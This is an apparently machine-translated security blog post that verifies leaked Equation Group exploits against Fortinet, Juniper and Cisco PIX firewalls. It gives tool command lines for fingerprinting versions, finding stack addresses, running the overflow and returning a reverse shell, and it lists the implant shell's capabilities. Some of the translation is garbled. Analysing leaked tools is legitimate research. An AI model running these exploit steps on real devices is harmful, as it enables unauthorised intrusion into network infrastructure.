*The original author of this article: tigerlab, this article belongs to the freebuf original award program and is not allowed to be reproduced without permission

On August 16, 2016, the hacker group "the shadow brokers" claimed to have invaded the "equation group" and leaked part of the hacker tools they obtained from the computer system of the hacker group to the Internet.

For the first time, tag lab has conducted in-depth analysis on the leaked files. Most of the vulnerability verification and analysis have been shared by peers. Now we share the verification and Analysis on the other three vulnerabilities that have not been analyzed, including Fortinet, juniper and Cisco.

1. Fortinet vulnerability verification

This vulnerability is mainly due to a buffer overflow vulnerability in the cookie parser, which allows remote attackers to execute arbitrary code by sending a crafted HTTP request.

CVE No.: cve-2016-6909

The following versions are affected:

4. X before Fortinet fortios 4.1.11,

4.2. X before 4.2.13,

4.3. X before 4.3.9,

Fortiswitch before 3.4.3.

The vulnerability verification process is as follows:

Get target Etag and judge version type

curl -X HEAD  –v   http://xxx.xxx.xxx.xxx/

curl -X HEAD  –v   http://xxx.xxx.xxx.xxx/

 

Etag:480d772a

If Etag is less than 4dxxxxxx, version 3 is applicable;

If Etag is greater than 4dxxxxxx, judge whether cookienum is required

curl -X HEAD  –v   http://xxx.xxx.xxx.xxx/login

Apscookie = 0 & 0, do not need to set cookienum when executing command

 

Apscookie_ = 0 & 0, cookienum needs to be set when executing the command, and the version is 4Nc

 

Test Etag is less than 4dxxxxxx, and cookienum does not exist

1) Get overflow address

Determine whether Etag exists in the configuration file egbl.config, for example:

 

If it does not exist, the stack address can be obtained by the following command:

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx-p 80 -l 5432 –ssl 0 -v –config ./EGBL.config –wam 10

This command is only applicable to Etag less than 4dxxxxxx, and there is no cookienum. It is invalid in other versions and cannot get the stack address.

The command is executed as follows:

 

Get stack address 0xbffff274 successfully

2) Execute shellcode and return to shell

You can bounce the shell by directly passing in the stack address,

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v --stack 0xbffff274  --nopen --gen 3

You can also write the Etag to the configuration file

ETAG = 480d772a : 0xbffff274

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v –etag 480d772a --nopen --gen 3 --config ./EGBL.config

 

Shell returned successfully, execute - LS command to get file directory information.

In this test, the main low version of the tower equipment, Etag is less than 4dxxxxxx. Due to the fact that the exploit overflow process is not in depth, if the stack cannot be obtained by command in other versions, it is tested by traversing the memory address in the configuration file, and the shell can bounce back successfully.

2. Juniper vulnerability verification

The vulnerability needs to obtain juniper device password first, and then attack according to the device version and model to obtain system permission.

Telnet login to obtain device version information

 

The device version number is ssg5ssg20.6.1.0r2.0. Check whether the device file exists in dats

 

Loophole reappearance

BICE-3110 in BARGLEE folder is a juniper exploiter

. / bice-3110 - R *. *. *. * / / target IP

-D 127.0.0.1 / / receive bounce shell host IP

-D 5555 / / receive bounce shell host port

-M telnet / / login mode SSH / telnet

-T.. /.. / dats / ssg5ssg20.6.1.0r2.0. XML / / attack code configuration

-U NetScreen / / device account

-P NetScreen / / device password

After success, return the basic information of the device. You can choose two kinds of shell permissions, juniper interactive shell and Bi shell.

 

The interactive console is actually the command operation after the joiner telnet enters.

 

BI shell

 

It can be seen that there are 6 options that can be executed:

Return to target status

Uninstall baglee

Install bulgee

Read memory

Write memory

Command execution

According to the installation instructions of barrice.txt in script, try to implant the barglee

 

The bin file type has been tried many times, but it has not been successfully implanted and cannot be analyzed in depth.

 

3. Cisco EPBA vulnerability verification

Like juniper, the vulnerability needs to obtain the device password first, and then obtain the system permission through overflow attack.

Loophole reappearance

 

 

The result is received MTU – EPBA: OK, payload: OK, indicating the overflow is successful.

At the same time, the control end of pix722 firewall will show buffer overflow

 

Next, we execute the script "bridge-1120" according to the operation prompt. After executing the "1" option, we can judge whether the connection is normal. If the connection is successful, we will return the session D-H key

 

After executing "8", you can view the shell function of Brice.

 

Multiple attempts to write to batigerlabnaglee indicate that the version is not correct and cannot be written.

                                          

It is found that the version number is obtained by reading the first four bytes of the target file, and all files in the folder are entered

The search did not find a suitable implant.

summary

This paper mainly shares the verification idea and process of three vulnerability utilization files: forinet, juniper and Cisco. stay

In the process of analysis, we have carried out a lot of test experiments to restore the whole attack process as much as possible, but due to the lack of some key files, we can not continue to conduct a complete analysis. If there are small partners who have better analytical ideas, we can communicate with them.

*The original author of this article: tigerlab, this article belongs to the freebuf original award program and is not allowed to be reproduced without permission